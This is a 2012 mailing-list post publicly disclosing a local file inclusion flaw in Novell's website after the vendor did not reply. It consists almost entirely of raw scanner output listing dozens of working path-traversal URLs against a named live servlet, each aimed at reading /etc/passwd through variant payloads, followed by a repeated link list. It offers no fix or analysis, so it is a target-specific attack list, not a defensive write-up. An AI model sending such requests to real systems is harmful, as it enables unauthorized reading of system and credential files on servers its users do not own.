Feb 9, 2012

Vulnerability in Novell website By Team

Vulnerability in Novell website. From: Team <team () uniscan com br>
Date: Wed, 08 Feb 2012 23:10:21 -0200

 

Hello :-)

I sent email stating the problem for the company,
waited a few days and got no response, so I'm making the vulnerability
public:

Scan date: 2-2-2012
13:33:54
===================================================================================================
|
Domain: http://www.novell.com/ [1]
| Server: Apache
| IP:
130.57.5.25
===================================================================================================
...


| LFI:
| [+] Vul[1] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd
[2]
| [+] Vul[2] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd.jpg
[3]
| [+] Vul[3] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd.html
[4]
| [+] Vul[4] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd.css
[5]
| [+] Vul[5] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd.php
[6]
| [+] Vul[6] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd.inc
[7]
| [+] Vul[7] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd.txt
[8]
| [+] Vul[8] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd.png
[9]
| [+] Vul[9] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=//../../../../../../../../etc/passwd
[10]
| [+] Vul[10] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=//../../../../../../../../etc/passwden
[11]
| [+] Vul[11] [LFI]
http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
[12]
| [+] Vul[12] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[13]
| [+] Vul[13] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[14]
| [+] Vul[14] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[15]
| [+] Vul[15] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[16]
| [+] Vul[16] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[17]
| [+] Vul[17] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[18]
| [+] Vul[18] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[19]
| [+] Vul[19] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[20]
| [+] Vul[20] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[21]
| [+] Vul[21] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwden&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[22]
| [+] Vul[22] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
[23]
| [+] Vul[23] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[24]
| [+] Vul[24] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[25]
| [+] Vul[25] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[26]
| [+] Vul[26] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[27]
| [+] Vul[27] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[28]
| [+] Vul[28] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[29]
| [+] Vul[29] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[30]
| [+] Vul[30] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[31]
| [+] Vul[31] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[32]
| [+] Vul[32] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwden&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[33]
| [+] Vul[33] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
[34]
| [+] Vul[34] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[35]
| [+] Vul[35] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[36]
| [+] Vul[36] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[37]
| [+] Vul[37] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[38]
| [+] Vul[38] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[39]
| [+] Vul[39] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[40]
| [+] Vul[40] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[41]
| [+] Vul[41] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[42]
| [+] Vul[42] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[43]
| [+] Vul[43] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwden&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[44]
| [+] Vul[44] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
[45]
| [+] Vul[45] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[46]
| [+] Vul[46] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[47]
| [+] Vul[47] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[48]
| [+] Vul[48] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[49]
| [+] Vul[49] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[50]
| [+] Vul[50] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[51]
| [+] Vul[51] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[52]
| [+] Vul[52] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[53]
| [+] Vul[53] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[54]
| [+] Vul[54] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwden&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[55]
| [+] Vul[55] [LFI]
http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
[56]
|

.......


===================================================================================================


Scan end date: 2-2-2012 15:4:27

--
Uniscan Team.



Links:
------
[1] http://www.novell.com/
[2]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd
[3]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd.jpg
[4]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd.html
[5]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd.css
[6]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd.php
[7]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd.inc
[8]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd.txt
[9]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd.png
[10]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=//../../../../../../../../etc/passwd
[11]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=//../../../../../../../../etc/passwden
[12]
http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
[13]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[14]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[15]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[16]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[17]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[18]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[19]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[20]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[21]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[22]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwden|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[23]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
[24]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[25]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[26]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[27]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[28]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[29]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[30]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[31]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[32]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[33]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwden|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[34]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
[35]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[36]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[37]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[38]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[39]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[40]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[41]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[42]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[43]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[44]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwden|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[45]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
[46]
http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
[47]
